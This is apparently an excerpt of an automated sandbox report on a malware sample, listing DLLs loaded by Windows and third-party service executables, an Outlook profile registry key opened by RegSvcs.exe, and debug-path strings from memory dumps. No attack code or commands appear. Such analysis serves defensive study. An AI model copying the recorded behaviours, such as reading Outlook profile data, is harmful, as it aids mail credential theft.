Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appvpolicy.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appmanagementconfiguration.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: tapi32.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: credui.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxstiff.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxsresm.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ualapi.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtctm.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcprx.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtclog.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: xolehlp.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: comres.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcvsp1res.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxoci.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: oci.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mfplat.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: rtworkq.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.devices.perception.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mediafoundation.defaultperceptionprovider.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.devices.enumeration.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: structuredquery.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mswb7.dll	Jump to behavior
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: devdispitemprovider.dll	Jump to behavior
Source: C:\Windows\System32\snmptrap.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: esent.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: version.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: appmanagementconfiguration.dll
Source: C:\Windows\System32\vds.exe	Section loaded: atl.dll
Source: C:\Windows\System32\vds.exe	Section loaded: osuninst.dll
Source: C:\Windows\System32\vds.exe	Section loaded: vdsutil.dll
Source: C:\Windows\System32\vds.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\vds.exe	Section loaded: uexfat.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ifsutil.dll
Source: C:\Windows\System32\vds.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\vds.exe	Section loaded: uudf.dll
Source: C:\Windows\System32\vds.exe	Section loaded: untfs.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ufat.dll
Source: C:\Windows\System32\vds.exe	Section loaded: fmifs.dll
Source: C:\Windows\System32\vds.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: virtdisk.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: spp.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: wer.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: fveapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: cscapi.dll

Source: C:\Windows\System32\AppVClient.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: SABXJ1B5c8.exe

Static file information: File size 1566208 > 1048576

Source: SABXJ1B5c8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000002.00000003.2154203886.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1561293289.0000000003E90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000002.00000003.2259687828.0000000000860000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2238224443.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2239453490.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000002.00000003.1801097699.0000000002030000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdb source: armsvc.exe, 00000002.00000003.1672501273.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000002.00000003.1985712542.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000002.00000003.1985712542.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000002.00000003.2002492724.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1609720901.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1664251039.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000002.00000003.2305241014.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2308488352.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: plugin-container.pdb source: armsvc.exe, 00000002.00000003.2520947525.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: armsvc.exe, 00000002.00000003.2448751622.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000002.00000003.1935345072.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000002.00000003.2148688241.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000002.00000003.2291707252.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.2.dr
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000002.00000003.2168802476.00000000019B0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2160376496.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
Source:	Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000002.00000003.1713083112.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000002.00000003.2051863988.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000002.00000003.1809580259.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.2.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\cnfnot32.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: CNFNOT32.EXE.2.dr
Source:	Binary string: pingsender.pdb source: armsvc.exe, 00000002.00000003.2505901701.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: SABXJ1B5c8.exe, 00000000.00000003.1597532692.0000000004150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000002.00000003.2002492724.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000002.00000003.1823253916.0000000001AD0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: private_browsing.pdb source: armsvc.exe, 00000002.00000003.2528548821.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000002.00000003.1809580259.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wbengine.pdb source: wbengine.exe.2.dr
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000002.00000003.2259687828.0000000000860000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2238224443.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2239453490.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\ocpubmgr.pdb source: OcPubMgr.exe.2.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000002.00000003.1935345072.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000002.00000003.2073828065.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000002.00000003.1801097699.0000000002030000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: armsvc.exe, 00000002.00000003.2305241014.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2308488352.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2136445285.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: armsvc.exe, 00000002.00000003.2485744889.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: armsvc.exe, 00000002.00000003.2476177945.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000002.00000003.2291707252.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000002.00000003.2118045779.0000000001F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000002.00000003.2051863988.0000000002000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: armsvc.exe, 00000002.00000003.2476177945.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000002.00000003.2125086655.0000000001AC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: private_browsing.pdbp source: armsvc.exe, 00000002.00000003.2528548821.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000002.00000003.2073828065.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000002.00000003.2154203886.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000002.00000003.2148688241.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000002.00000003.2485744889.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\cnfnot32.pdb source: CNFNOT32.EXE.2.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000002.00000003.2168802476.00000000019B0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2160376496.0000000001FC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: armsvc.exe, 00000002.00000003.1677820139.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000002.00000003.1677820139.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
